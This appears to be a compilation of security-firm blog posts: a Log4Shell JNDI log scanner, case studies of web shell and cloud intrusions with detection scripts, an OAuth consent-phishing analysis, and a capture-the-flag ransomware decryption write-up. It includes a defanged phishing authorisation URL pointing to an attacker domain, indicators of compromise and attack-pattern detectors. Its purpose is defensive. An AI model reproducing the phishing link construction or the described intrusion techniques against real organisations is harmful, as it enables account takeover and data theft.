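    """Return (scheme, host:port) for every JNDI lookup string in a log line."""
    return [(m.group(1).lower(), m.group(2))
            for m in _JNDI_LOOKUP.finditer(normalise(line))]


def scan(lines):
    """Scan log lines and return one record per lookup found, keyed by line number."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for scheme, endpoint in find_jndi_lookups(line):
            hits.append({"line": number, "scheme": scheme, "callback": endpoint})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG4J_LINES):
        print(hit)
```

The `callback` value is the pivot for the rest of the investigation: it is the address to search for in egress firewall and DNS logs, and, as the post notes in its mitigations, the class of outbound LDAP/RMI connection from application servers that should be blocked in the first place.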

Once they had successfully exploited Log4Shell, they dropped the Behinder web shell (or “冰蝎”). Behinder is a versatile, multi-platform web shell created by a Chinese-speaking developer and popular within the hacking community in the same country (link). This web shell allows for AES-encrypted command and control (C2) traffic (link), which helped the threat actor maintain stealth and persistence in their victim’s environment.

Fig 2 – example of Behinder web shell’s user interface, likely used by the attacker to interact with the victim’s environment

The threat actor then performed enumeration of the internal system with the web shell and obtained the application credentials to access the backend application database. In this database the threat actor issued search queries via the web shell. These used terms revealing their interest in customer data such as customers’ names, email addresses and residential addresses. At this point, limited log availability did not allow us to determine the amount and nature of data accessed and exfiltrated.

Intruders interacted with the compromised servers via throwaway infrastructure. They used Vultr Virtual Private Servers (VPS) hosted in South Korea for several consecutive days, followed by VPS hosted in Japan in the subsequent network spikes. Adversaries typically rent VPS from service providers such as Vultr to host their C2 servers while masking the origin of their source IP addresses, thereby preventing security researchers from easily tracing and linking their infrastructure with previously known intrusions.

Who is Behinder the intrusion?  

We do not have enough evidence to confidently attribute the intrusion to a known threat actor group. The large amount of customers’ personally identifiable information the victim held was of likely interest to financially and politically-motivated threat actors alike.

However, the use of the Behinder web shell strongly suggests a Chinese-speaking threat actor. We also noticed that a recent open source paper (link) on the Earth Lusca group describes the actor as using Vultr VPS infrastructure and dropping Behinder, which matches our observed activity. Notably, Earth Lusca has also previously targeted Hong Kong organisations. However, this allegedly state-sponsored group routinely uses malware like Winnti and Cobalt Strike, which we have not seen in this incident. This, and the relatively generic TTPs observed, hinders any confident attribution assessment.


  • Echoing our 2022 predictions advice, organisations should profile their attack surface to understand services open, technologies used, and known vulnerabilities. Patching programmes should enable a threat-based prioritisation of missing security patches and facilitate rapid deployment of critical security patches within aggressive timeframes.
  • Build a robust enterprise security architecture with layered defense to address potential security risks to critical assets (i.e., data, infrastructure, applications).
  • Enable security audit logs to ensure maximum visibility on existing security monitoring. In particular, ensure that logs’ retention period is sufficient to support after-the-fact investigations of potential incidents.
  • Implement specific mitigations against Log4Shell and related Log4j vulnerabilities, including blocking specific outbound Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) network traffic.


  • Reconnaissance: Active Scanning (T1595)
  • Initial Access: Exploit Public-Facing Application (T1190)
  • Persistence: Server Software Component – Web Shell (T1505.003)
  • Discovery: File and Directory Discovery (T1083)
  • Discovery: Network Service Scanning (T1046)
  • Collection: Data from Local System (T1005)
  • Command and Control: Application Layer Protocol – Web Protocols (T1071.001)
  • Command and Control: Encrypted Channel – Symmetric Cryptography (T1573.001)
  • Exfiltration: Exfiltration Over C2 Channel (T1041)

Indicators of Compromise (IOCs)

Feel free to contact us at [threatintel at darklab dot hk] for the full set of Indicators of Compromise (IOCs).

What to expect in 2022

We do not have a crystal ball to predict the future. However, we have plenty of experience in researching, responding, and mitigating cyber threats for our clients. The last eighteen months saw a dramatic evolution of the cyber security challenges companies face. Based on what we are observing in the threat landscape and the conversations we are having with industry leaders across sectors, here we outline what DarkLab cyber threat analysts assess will be some of the most relevant issues in 2022. 

Ransomware profits will ensure ongoing exploitation by lesser-known gangs 

Human-operated ransomware with a double extortion tactic exploded in 2020, kept growing in 2021, and we expect it to continue to pose a high threat to organisations in 2022. Our analysis of ransomware groups’ posts on the dark web shows no sign of the underground industry slowing down.

What we expect to change is criminals’ branding tactics. Well known ransomware-as-a-service outfits like BlackMatter and REvil exploited their fame to attract affiliates and threaten victims into meeting their ransom demands. However, their high profile attracted law enforcement attention, including in their domestic countries like Russia, and has led to these groups’ downfall. A logical reaction will likely see cybercriminals avoiding the same mistakes and maintaining a lower profile. Expect a larger number of smaller ransomware gangs in 2022. 

Increased threat to cryptocurrency businesses  

While extortion has been the main profitable enterprise for cybercriminals in 2021, the profits will likely be reinvested in diversifying operations. Sophisticated groups like APT38 and individual hackers have in 2021 shown the potential profitability of targeting cryptocurrency exchanges and start-ups. Laundering millions of dollars worth of cryptocurrency is, for now at least, easier for criminals than moving large sums across the traditional financial system.

As more and larger companies join the cryptocurrency business, and regulators still lag behind in imposing strict anti-fraud controls, there is a likely window of opportunity for criminals to exploit.  

Increased emphasis on private sector players in espionage operations 

Security researchers have warned of the threat posed by private sector spyware providers for a long time, although governments have only recently acted on it and imposed sanctions on some of the best known companies in the field. Israeli companies like NSO and Candiru are the highest profile names in a crowded industry providing many shades of services, from legitimate offensive toolsets to hack-for-hire operations, particularly in South and South East Asia.  

Even though governments worldwide have allegedly used private sector contractors in part of their offensive operations’ supply chain, last year’s increased media and government interest has put a spotlight on the issue. We expect more such campaigns to be highlighted in 2022.

Cloud supply chain is a potential single point of failure 

This prediction is, we truly hope, one that is not going to happen in the coming year, but rather a wider concern based on the dynamics we are observing in the IT industry and the cyber threat landscape.

Companies have moved to the cloud at an unprecedented speed during the last two years, and we are not seeing any deceleration on the horizon. However, increased data crunching in the cloud is not always met with a proportional increase in cloud security spending, best practices for which are still in their relative infancy.  

The number of trusted cloud vendors is also limited, with a few very large companies hosting most of the world’s data. Granted, companies like Microsoft, Amazon, Tencent and Alibaba have very good security teams and large security budgets. However, they also represent obvious central systems linked to many large organisations of interest to threat actors. Cloud systems’ outages, like those affecting a major US-based provider in December 2021, demonstrated the potential impact an attack on these companies could have on their customers.

The mass and rapid exploitation of MS Exchange, ProxyShell and Log4shell also showed how adept threat actors are at weaponising vulnerabilities in widely used digital systems, and how these campaigns can paralyse security teams worldwide for weeks.  

Finally, the most sophisticated among threat actors, like APT29/Nobellium, have already demonstrated their intent and capability to successfully exploit cloud supply chain to gain access to high profile targets. Our experience suggests that where sophisticated state-sponsored threat actors go, criminals eventually follow.  

As such, the exploitation of cloud supply chain is likely among the highest threats to organisations in 2022 and beyond. Fortunately, much can be done to mitigate this threat by careful planning, including thorough application of zero-trust architecture and a shift-left approach to cloud devsecops. 

Recommendations to secure your 2022

We do not expect the challenges facing cyber security professionals in the coming year to be less ominous than those we just put behind us. Nonetheless, 2021 taught us plenty of useful lessons that can equip companies with the right strategies and tools to successfully mitigate cyber threats we may face in 2022.

  • Comprehensive intrusion defense strategy: Our incident response and threat hunting experience suggests that a few best practices go a long way to prevent most network intrusions:
    1. Attack surface hardening: enterprises should focus on profiling their attack surface, including services open and technologies used, and reducing their internet-exposed infrastructure.
    2. Identifying and protecting critical internal systems: threat actors, especially ransomware operators, actively look for systems in their victims’ network that serve crucial functions and hold sensitive data (e.g. Domain Controllers, backup servers, file servers). Securing these systems would reduce the impact of an intrusion and increase the likelihood of detection, while increasing costs for attackers.
    3. Defending against lateral movement: the majority of threat actors moving across networks rely on mechanisms that are relatively easy to disrupt with security restrictions, such as restricting Remote Desktop Protocol between user zones and disabling Windows Remote Management, among others.
    4. Protecting user accounts and privileged access: good credential protection and management are key measures in limiting credential theft and abuse. Security measures should include multi-factor authentication for remote or sensitive access, housekeeping of user and system accounts, and credential hardening for privileged accounts by using managed service accounts (MSA) and the Protected Users group.
  • Risk-based security controls help overcome limitations: budget and human resources are finite. Prioritising them in the most efficient way is crucial to a timely and effective security strategy. Companies should understand the intent and capabilities of the most likely threats they face. Assessing the likelihood of threats to critical systems and their potential impact is what makes a risk-based approach to security effective. By understanding the most likely TTPs threat actors will use against your most important systems, companies can prioritise the application of the most urgent security controls.
  • Cloud security needs a strategy: as threats to the cloud mature, so should organisations’ strategies to secure their cloud systems. Cloud posture monitoring and cloud-specific MITRE ATT&CK TTP detection use cases can help in identifying ongoing threats. Using existing blueprints for cloud deployment, a shift-left approach to DevSecOps, and enhancing automation with infrastructure-as-code are important preventive measures that also help alleviate the ongoing scarcity of cyber talent.

Trouble in Paradise

A case study of Cloud compromise

Many organisations are increasingly moving to cloud solutions to solve their hosting needs, but outsourcing workloads should not imply outsourcing security as well. The importance of securing the cloud was recently highlighted by the targeting of Microsoft Azure environments by Nobellium, the threat actor behind the SolarWinds Orion compromise. The threat actor notably exploited stolen SAML certificates for vertical movement, a rarely seen technique. Even without novel techniques, less sophisticated cybercriminal threat actors can also pose a threat to companies’ services in the cloud. Indeed, this week’s supply chain compromise operation by REvil is suspected to have been launched from a compromised web server hosted on AWS.

The Incident

Recently, DarkLab’s incident response team has helped a South Asian client in the media sector to remediate an incident involving multiple cloud environments breaches, a case study we think can help organisations better plan for secure implementations of their cloud environments.

The incident originated from a likely exploitation of a known remote code execution vulnerability in a Jenkins instance, an open source software development automation server. The server was hosted in an Amazon Web Services (AWS) environment and had a hardcoded root access key. With that, the threat actor was able to roam the compromised environment undetected for four months. Log availability has been an issue due to the lack of CloudTrail log retention, but we know that the threat actor created multiple IAM user accounts and accessed internal data, including data stored in S3 buckets, via the free Windows client S3 Browser.

Their primary intent, however, was to use the victim as a jumping-off point to identify other targets vulnerable to the same Jenkins RCE and move laterally to their servers. They did so by deploying Linux and Windows virtual machines in new EC2 instances in the compromised environment to scan and exploit external IP addresses. They used t2.micro sizing to avoid spikes in usage and remain hidden. The attacker deployed the additional EC2 instances in a different AWS region than that used by the victim, an anomaly that we suggest organisations monitor for.

A deeper dive into the system log of the Linux VMs shows that the attacker likely used Shodan to identify other vulnerable Jenkins instances online, suggesting their targeting was likely opportunistic. Similarly, analysis of the IP addresses used by the attacker to access our client – most of them AWS instances themselves – suggests the attack likely originated from multiple other compromised organisations.

From AWS, the threat actor managed to access an FTP server within a parallel Google Cloud Platform (GCP) environment. For this, they used a compromised hard-coded credential found in one of the configuration files in the victim’s BitBucket repository, also suspected to be compromised. After thorough environment and user enumeration, the attacker was able to obtain the password for another G Suite user account, which they used to access data in the GCP environment and Google Drive.

Shortly after accessing GCP, the threat actors attempted to cover their tracks by deleting the company’s entire production environment, all hosted on AWS, and the backup copies. Fortunately, AWS retained some copies of the deleted backups, which it was able to provide to the victim organisation.

However, while the victim restored their AWS system, they were not aware that the root access key needed to be reset. Unsurprisingly, the attacker quickly re-established a presence in their cloud and a few days later re-deleted the production environment, although no ransom demand was recorded. This was when our incident response team was called to help.


Our investigation suggested that the threat actor behind this campaign is likely operating opportunistically and with a relatively low technical know-how. We often found traces of internet searches for open source tools or “how to” techniques. Nonetheless, such an actor could still pose significant operational damage to a large company by deleting their production environment.

The incident shows how even relatively unsophisticated threat actors are adopting an island-hopping approach by abusing imperfect implementations of commercial cloud platforms. Companies should ensure that standard security practices, like rotating passwords or access keys, monitoring suspicious activities, and prompt patching, are also applied to cloud environments.

What’s next?

Our experience suggests that this was not an uncommon attack path for adversaries targeting cloud environments. Monitoring for common attack vectors can help identify suspicious behaviour earlier and contain an incident before it is too late.

Below are some monitoring metrics mapped against MITRE ATT&CK tactics that we recommend organisations implement in AWS Config, Lambda, or their choice of CSPM platform for automated detection and remediation.

Feel free to contact us at [threatintel at darklab dot hk] for the full set of 50 custom MITRE-based rules on AWS

Tactic                        | Technique (custom)                                                                           | Log Source
Initial access                | AWS user login failed multiple times                                                         | CloudTrail
Initial access                | Multiple worldwide successful console logins                                                 | GuardDuty
Initial access                | Potential web scanning activity with multiple web server 400 errors from the same source IP  | Web access log
Privilege Escalation          | AWS “AssumeRole” from rare external AWS account                                              | CloudTrail
Discovery                     | AWS potential IAM enumeration activities                                                     | CloudTrail
Defense Evasion / Persistence | Create/update managed policy with excessive permissions                                      | CloudTrail
Impact                        | AWS access key enabled                                                                       | CloudTrail
Exfiltration                  | Egress rule added to a security group                                                        | CloudTrail
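Several of the CloudTrail-sourced rules in the table reduce to simple field checks on the raw records, so they can be prototyped before being moved into Config, Lambda or a CSPM. The script below is an added example written for this post (not DarkLab's rule set and not code from the incident): it implements the failed-login, external AssumeRole, access-key-enabled and egress-rule rules from the table, plus the out-of-region EC2 launch anomaly described in the case study. The records are constructed CloudTrail-style events with made-up account IDs, IPs and names; `HOME_REGIONS` and the failure threshold are assumptions that a real deployment would tune to the tenant.

```python
from collections import Counter

# Constructed CloudTrail-style records; abbreviated and not taken from the incident described above.
# Field names follow the CloudTrail record format, all values are made up.
SAMPLE_EVENTS = [
    {"eventName": "ConsoleLogin", "awsRegion": "us-east-1", "recipientAccountId": "111111111111",
     "userIdentity": {"type": "IAMUser", "userName": "deploy", "accountId": "111111111111"},
     "sourceIPAddress": "203.0.113.7", "responseElements": {"ConsoleLogin": "Failure"}},
    {"eventName": "ConsoleLogin", "awsRegion": "us-east-1", "recipientAccountId": "111111111111",
     "userIdentity": {"type": "IAMUser", "userName": "deploy", "accountId": "111111111111"},
     "sourceIPAddress": "203.0.113.7", "responseElements": {"ConsoleLogin": "Failure"}},
    {"eventName": "ConsoleLogin", "awsRegion": "us-east-1", "recipientAccountId": "111111111111",
     "userIdentity": {"type": "IAMUser", "userName": "deploy", "accountId": "111111111111"},
     "sourceIPAddress": "203.0.113.7", "responseElements": {"ConsoleLogin": "Failure"}},
    {"eventName": "AssumeRole", "awsRegion": "ap-east-1", "recipientAccountId": "111111111111",
     "userIdentity": {"type": "AWSAccount", "accountId": "999999999999"},
     "requestParameters": {"roleArn": "arn:aws:iam::111111111111:role/Admin"}},
    {"eventName": "RunInstances", "awsRegion": "us-west-2", "recipientAccountId": "111111111111",
     "userIdentity": {"type": "IAMUser", "userName": "deploy", "accountId": "111111111111"},
     "requestParameters": {"instanceType": "t2.micro"}},
    {"eventName": "UpdateAccessKey", "awsRegion": "us-east-1", "recipientAccountId": "111111111111",
     "userIdentity": {"type": "Root", "accountId": "111111111111"},
     "requestParameters": {"userName": "deploy", "status": "Active"}},
    {"eventName": "AuthorizeSecurityGroupEgress", "awsRegion": "ap-east-1",
     "recipientAccountId": "111111111111",
     "userIdentity": {"type": "IAMUser", "userName": "deploy", "accountId": "111111111111"},
     "requestParameters": {"groupId": "sg-0123456789abcdef0"}},
    {"eventName": "DescribeInstances", "awsRegion": "ap-east-1", "recipientAccountId": "111111111111",
     "userIdentity": {"type": "IAMUser", "userName": "deploy", "accountId": "111111111111"}},
]

HOME_REGIONS = {"ap-east-1"}      # assumption: the tenant normally deploys only to Hong Kong
FAILED_LOGIN_THRESHOLD = 3        # assumption: alert on the third failure from one actor and IP


def _alert(tactic, rule, event, subject):
    return {"tactic": tactic, "rule": rule, "subject": subject,
            "region": event.get("awsRegion"), "source_ip": event.get("sourceIPAddress")}


def detect(events, home_regions=HOME_REGIONS, threshold=FAILED_LOGIN_THRESHOLD):
    """Run the rules over CloudTrail records in order and return the alerts raised."""
    alerts = []
    failures = Counter()
    for e in events:
        ident = e.get("userIdentity", {})
        name = e.get("eventName")
        actor = ident.get("userName") or ident.get("type", "unknown")
        req = e.get("requestParameters") or {}
        resp = e.get("responseElements") or {}
        if name == "ConsoleLogin" and resp.get("ConsoleLogin") == "Failure":
            key = (actor, e.get("sourceIPAddress"))
            failures[key] += 1
            if failures[key] == threshold:   # fire once, when the threshold is reached
                alerts.append(_alert("Initial access", "repeated console login failures", e, actor))
        elif name == "AssumeRole" and ident.get("accountId") not in (None, e.get("recipientAccountId")):
            # The caller's account differs from the account that owns the role.
            alerts.append(_alert("Privilege escalation", "AssumeRole from external AWS account",
                                 e, ident["accountId"]))
        elif name == "RunInstances" and e.get("awsRegion") not in home_regions:
            alerts.append(_alert("Execution", "EC2 instance launched outside home region",
                                 e, e.get("awsRegion")))
        elif name in ("CreateAccessKey", "UpdateAccessKey"):
            # CreateAccessKey reports the status in the response, UpdateAccessKey in the request.
            status = req.get("status") or (resp.get("accessKey") or {}).get("status")
            if status == "Active":
                alerts.append(_alert("Impact", "access key enabled", e, req.get("userName", actor)))
        elif name == "AuthorizeSecurityGroupEgress":
            alerts.append(_alert("Exfiltration", "egress rule added to a security group",
                                 e, req.get("groupId")))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

The AssumeRole rule is deliberately strict (any cross-account caller); in production it would be narrowed with an allowlist of partner accounts, which is what "rare" means in the table. Note that the rule set only works if CloudTrail is retained, which the case study identifies as the gap that made the four-month dwell time possible.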

Not Token for Granted

New phishing campaign against financial services steals OAuth tokens to bypass MFA in O365 accounts

DarkLab recently discovered a suspicious email which we identified as part of an active phishing campaign primarily targeting banks and investment companies worldwide, including a number of targets in Hong Kong. The campaign initially seemed aimed at stealing victims’ credentials, a common tactic among threat actors. However, a closer look showed that the threat actors leveraged the OAuth2 framework to gain permissions to the victim’s O365 account through a rogue Azure application. This would have allowed them to bypass multi-factor authentication controls and directly access the victim’s account with a stolen OAuth token, rendering this a particularly effective social engineering tactic.

Overall, this campaign shows how financially motivated threat actors are evolving their tactics, techniques, and procedures to exploit companies’ increasing reliance on cloud infrastructure.

Phishing email analysis

The email is sent from a domain of a separate entity, likely compromised by the threat actor before initiating the attack against our client. The email metadata also suggests deliberate spoofing of the SMTP FROM header.

The email contains a fake e-signature verification request, along with a link to “Review and sign”.

The link is crafted to present the user with a request screen (see figure above) to grant permissions to a rogue Azure application. Depending on the threat actors’ intent, the permissions request can be modified to allow access to cloud-hosted documents and applications, including the email account.

Here is an example of the phishing link:

hxxps://login.windows.net/common/oauth2/authorize?response_type=code&client_id=70ab9cd5-96a5-4dee-b9af-xxxxxxxxxxxx&client_secret=ef17da38-f26c-49d9-9c9c-xxxxxxxxxxxx&redirect_uri=https%3A%2F%2Fkp3jccawgk[.]online&resource=https%3A%2F%2Fkp3jccawgk[.]online&state=xxxxxxxxxxxx#efe1b61bcf8df6b76595xxxxxxxxxxxx

The URL above represents an access request to the Microsoft identity platform asking for an authorization code, denoted by the response_type field. The client_id field denotes the unique ID of an Azure application owned by the threat actor, with a redirect_uri field pointing to a domain – kp3jccawgk[.]online – staged by the threat actor to capture the redirected HTTP request once the victim grants the access permission.

To create such an attack infrastructure the threat actor only needs to register a rogue application under an Azure tenant, and to host a website to capture the URL requests and authorization codes. The redirected site also contains JavaScript snippets that detect the accessing IP address and details of the victim organisation, very likely for profiling victims and filtering out potential accesses from security vendors.

Eventually, the victim is redirected to a blank page, now defunct.

Threat actors would then leverage the rogue application and request a valid access token with the authorization code. They could then access the victim’s O365 account with the permissions granted during the phishing process, and perform a variety of actions from accessing account information to sending emails on behalf of the victim.

This attack aims at stealing access tokens in the form of OAuth tokens. This allows direct access to a victim’s account and bypasses the need to steal valid user credentials, including multi-factor authentication.
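Because the phishing link is a legitimate Microsoft authorisation request, URL reputation alone will not catch it; what stands out are the parameters. The triage function below is an added example written for this post, not DarkLab's or Microsoft's code: it parses an authorize-endpoint link and flags a redirect_uri host that is not an allowlisted application host, a client_id that is not a sanctioned app, a client_secret in a browser-facing URL (the authorisation endpoint never takes one), and a resource that is not a Microsoft API. The sample link is the defanged one from the post with its placeholders kept; `TRUSTED_REDIRECT_HOSTS` and `SANCTIONED_CLIENT_IDS` are hypothetical allowlists an organisation would maintain.

```python
from urllib.parse import parse_qs, urlsplit

# The defanged link from the post, kept as printed; refang() is applied before parsing.
SAMPLE_LINK = ("hxxps://login.windows.net/common/oauth2/authorize?response_type=code"
               "&client_id=70ab9cd5-96a5-4dee-b9af-xxxxxxxxxxxx"
               "&client_secret=ef17da38-f26c-49d9-9c9c-xxxxxxxxxxxx"
               "&redirect_uri=https%3A%2F%2Fkp3jccawgk[.]online"
               "&resource=https%3A%2F%2Fkp3jccawgk[.]online"
               "&state=xxxxxxxxxxxx#efe1b61bcf8df6b76595xxxxxxxxxxxx")

MS_AUTHZ_HOSTS = {"login.windows.net", "login.microsoftonline.com", "login.microsoft.com"}
MS_RESOURCE_SUFFIXES = (".microsoft.com", ".office365.com", ".windows.net", ".office.com")
# Hypothetical allowlists: hosts and app IDs the organisation has sanctioned.
TRUSTED_REDIRECT_HOSTS = {"apps.contoso.example"}
SANCTIONED_CLIENT_IDS = {"00000000-0000-0000-0000-00000000beef"}


def refang(url: str) -> str:
    """Turn a defanged indicator back into a parseable URL."""
    return (url.replace("hxxps://", "https://").replace("hxxp://", "http://")
               .replace("[.]", ".").replace("%5B.%5D", "."))


def triage_authorize_link(url, trusted_redirect_hosts=TRUSTED_REDIRECT_HOSTS,
                          sanctioned_client_ids=SANCTIONED_CLIENT_IDS):
    """Return a list of findings for a Microsoft identity platform authorisation link."""
    parts = urlsplit(refang(url))
    if parts.hostname not in MS_AUTHZ_HOSTS or not parts.path.endswith("/authorize"):
        return []   # not an authorisation request; outside this check's scope
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    findings = []

    redirect_host = urlsplit(refang(params.get("redirect_uri", ""))).hostname
    if redirect_host and redirect_host not in trusted_redirect_hosts:
        findings.append(f"redirect_uri host {redirect_host} is not an allowlisted application host")

    client_id = params.get("client_id")
    if client_id and client_id not in sanctioned_client_ids:
        findings.append(f"client_id {client_id} is not a sanctioned application")

    if "client_secret" in params:
        findings.append("client_secret present in a browser-facing authorisation URL")

    resource_host = urlsplit(refang(params.get("resource", ""))).hostname
    if resource_host and not resource_host.endswith(MS_RESOURCE_SUFFIXES):
        findings.append(f"resource {resource_host} is not a Microsoft API host")
    return findings


if __name__ == "__main__":
    for finding in triage_authorize_link(SAMPLE_LINK):
        print("-", finding)
```

Used inside a mail gateway or URL-rewriting proxy, a non-empty result on an inbound message is a good reason to hold the message for review, since the link itself will resolve to a trusted Microsoft host and pass most reputation checks.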

Attack infrastructure and insights into the campaign

By pivoting on the redirect domain, we were able to identify multiple threat actor domains suggesting that they are very likely targeting banks, asset managers, equity firms, and to a lesser degree also law firms and consultancies around the world, including Hong Kong. According to domain registration data, the campaign started at the end of February and is currently active. Based on the nature of its targeting, the campaign appears to be financially motivated.

Detection and remediation

To detect malicious behavior linked to a user falling victim to a similar phishing email, the most effective way is to monitor Azure audit logs for “Consent to Application” events. These represent users’ approval to grant permissions to third-party applications. Microsoft Cloud App Security is also a good place to detect new OAuth applications with high privileges in the tenant.

Sample Microsoft Azure log showing a Consent to Application event for a malicious Azure application

In the event that an internal user falls victim and consent is given to a rogue application, IT teams can manually remove the granted access under the “Enterprise Applications” section of the Microsoft Azure portal, and ensure that the user credentials are reset and protected by MFA. As a preventive measure, IT teams are also recommended to leverage Azure AD admin consent to force administrator involvement and gatekeep user data against this kind of attack tactic.
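The “Consent to application” audit events recommended above carry the granted scopes and whether an administrator approved them, which is enough to separate a user clicking “Accept” on a mail-reading app from a routine admin-approved line-of-business app. The detector below is an added example written for this post, not DarkLab's rule or Microsoft code. The records are constructed to resemble Entra ID (Azure AD) directory audit entries as exposed through the Microsoft Graph directoryAudit resource; the exact layout of the `ConsentAction.Permissions` value is an assumption about that schema, and the regular expression is written to tolerate variations in it. `HIGH_RISK_SCOPES` is a starting list a tenant would extend.

```python
import re

# Constructed samples modelled on Entra ID (Azure AD) directory audit records; the field names are an
# assumption about the Microsoft Graph directoryAudit schema and every value is made up.
SAMPLE_AUDIT_EVENTS = [
    {"activityDisplayName": "Consent to application", "category": "ApplicationManagement",
     "result": "success",
     "initiatedBy": {"user": {"userPrincipalName": "alice@contoso.example"}},
     "targetResources": [{"displayName": "Review and sign", "type": "ServicePrincipal",
                          "modifiedProperties": [
                              {"displayName": "ConsentContext.IsAdminConsent", "newValue": "\"False\""},
                              {"displayName": "ConsentAction.Permissions",
                               "newValue": "\"[] => [[Id: 1, ClaimValue: Mail.Read, Type: Delegated], "
                                           "[Id: 2, ClaimValue: offline_access, Type: Delegated]]\""}]}]},
    {"activityDisplayName": "Consent to application", "category": "ApplicationManagement",
     "result": "success",
     "initiatedBy": {"user": {"userPrincipalName": "bob@contoso.example"}},
     "targetResources": [{"displayName": "Contoso Expenses", "type": "ServicePrincipal",
                          "modifiedProperties": [
                              {"displayName": "ConsentContext.IsAdminConsent", "newValue": "\"True\""},
                              {"displayName": "ConsentAction.Permissions",
                               "newValue": "\"[] => [[Id: 3, ClaimValue: User.Read, Type: Delegated]]\""}]}]},
    {"activityDisplayName": "Add user", "category": "UserManagement", "result": "success",
     "initiatedBy": {"user": {"userPrincipalName": "admin@contoso.example"}}, "targetResources": []},
]

# Delegated scopes that let a third-party app read or send mail, reach files, or keep a refresh token.
HIGH_RISK_SCOPES = {"Mail.Read", "Mail.ReadWrite", "Mail.Send", "MailboxSettings.ReadWrite",
                    "Files.Read.All", "Files.ReadWrite.All", "Contacts.Read", "offline_access"}
_CLAIM = re.compile(r"ClaimValue:\s*([A-Za-z0-9_.]+)")


def _modified_properties(event):
    for target in event.get("targetResources", []):
        for prop in target.get("modifiedProperties", []):
            yield prop.get("displayName"), prop.get("newValue", "")


def consent_scopes(event):
    """Set of scopes granted in a 'Consent to application' event."""
    scopes = set()
    for name, value in _modified_properties(event):
        if name == "ConsentAction.Permissions":
            scopes.update(_CLAIM.findall(value))
    return scopes


def is_admin_consent(event):
    return any(name == "ConsentContext.IsAdminConsent" and "True" in value
               for name, value in _modified_properties(event))


def find_risky_consents(events, high_risk=HIGH_RISK_SCOPES):
    """Flag user (non-admin) consents that grant any high-risk scope."""
    alerts = []
    for event in events:
        if event.get("activityDisplayName") != "Consent to application":
            continue
        risky = consent_scopes(event) & high_risk
        if risky and not is_admin_consent(event):
            app = event["targetResources"][0].get("displayName", "?")
            user = event.get("initiatedBy", {}).get("user", {}).get("userPrincipalName", "?")
            alerts.append({"user": user, "app": app, "scopes": sorted(risky)})
    return alerts


if __name__ == "__main__":
    for alert in find_risky_consents(SAMPLE_AUDIT_EVENTS):
        print(alert)
```

Each alert names the user and the application, which is exactly what the remediation step above needs: remove the application's grant under Enterprise Applications and reset the user's credentials. With admin consent enforced, the `IsAdminConsent` check stops firing for end users, and the same rule then serves as a control that the policy is actually in place.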

Indicators of compromise

  • 188.166.68[.]51
  • kp3jccawgk[.]online
  • 17l78xgnzj[.]online
  • 4zl8t4sqon[.]online
  • 9ybzef6d2h[.]online
  • cprapid[.]com
  • cts1g02r2c[.]online
  • kp3jccawgk[.]online
  • l7p5g1kwh4[.]online
  • num7ewnkn1[.]online
  • rh6757nysb[.]online
  • wbxputufpj[.]online
  • wzoschqdd0[.]online

Hackaday 2020 – Securing the basics [P-3]

Incident Response and Threat Intelligence Challenge

As we mentioned in our previous posts on the Web and Cloud challenges, every year DarkLab organises a capture the flag cybersecurity competition designed for undergraduate students aiming to raise the competency level of future talents to better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Security the Basics”, based on the experience and real life challenges that organisations in Hong Kong have faced in 2020 – as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we want to provide the solution to the different challenges students faced. We hope that this will stimulate even more students to get their hands on the keyboard next year! In this post we cover the Incident Response (IR) and Threat Intelligence (TI) questions.

Ransomware Attack Again 1 (50 pts, 14 solves)

Description: Our client has been hit by a ransomware attack. While the rest of the client’s PCs have been restored, the head of IT insists on decrypting the data to recover an important screenshot of server settings and passwords. They refuse to pay the ransom. The sysadmin left only the snapshot of the infected server.

It seems there is not much left to see. We’re reaching out to you, our best malware analyst, to help research and find a way to decrypt the screenshot.

RDP: hackaday2020-teamX-ransomware.eastasia.cloudapp.azure.com, where X is your team number

After connecting via RDP to the machine, we can see another user named sysadmin by navigating around the file system. On that user’s desktop, the following are found:

  • Ransomware affected file with extension HKADYYY
  • Ransom note HKADYYY-README, containing a flag


Ransomware Attack Again 2 (100 pts, 7 solves)

Description: Other than the ransom note, what other artefacts could you find?

By navigating the Windows event logs, we notice a suspicious PowerShell code snippet: a large base64 payload (powershell.exe with the -e option).

The following two values are found by decoding the base64:

  • Caller script : . $prog -InV 'MTIzNDU2Nzg5MDEyMzQ1Ng=='
  • Second flag


Ransomware Attack Again 3 (50 pts, 2 solves)

Description: sometimes there is public research on the ransomware behavior which may help you to decrypt the files. Try to surf the net!

A search online will not reveal much, until you check on Twitter, where you will find the following tweet.

The tweet contains the following link : https://0bin.net/paste/xBy4OoNz#0lSty7wpQSy2risE3g6X2Idj4HTNyhy6YaUgeWBmC0-

This 0bin.net post includes a small summary of the ransomware, a decryption routine, and the third flag hackaday{Blrdi3 w!th th3 g00d n@vvS}

Ransomware Attack Again 4 (300 pts, 0 solves)

Description: You are in the final step, tell me the content of the decrypted file!

According to the decryption routine, successful decryption requires two values:

  1. IV: given by the base64 string located in the loader: MTIzNDU2Nzg5MDEyMzQ1Ng==
  2. Key seed: a random two-digit number followed by the SID (obtained by checking the user that executed the ransomware, i.e. sysadmin), i.e. a value between

00S-1-5-21-1580626154-3826959220-856111413-500 and 99S-1-5-21-1580626154-3826959220-856111413-500

The following decryption code uses the IV and the key corresponding to the two-digit value 99:

$IV = "MTIzNDU2Nzg5MDEyMzQ1Ng=="
$Key = "ODgxM2QyOTU4ZjljODAzOGVjMDhiMjljYjFjODgzMGM="
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
$aesManaged.Key = [System.Convert]::FromBase64String($Key)
$decryptor = $aesManaged.CreateDecryptor()
$fileToDecrypt = "C:\path\to\encrypted\file.HKADYYY"
$encryptedBytes = [System.IO.File]::ReadAllBytes($fileToDecrypt)
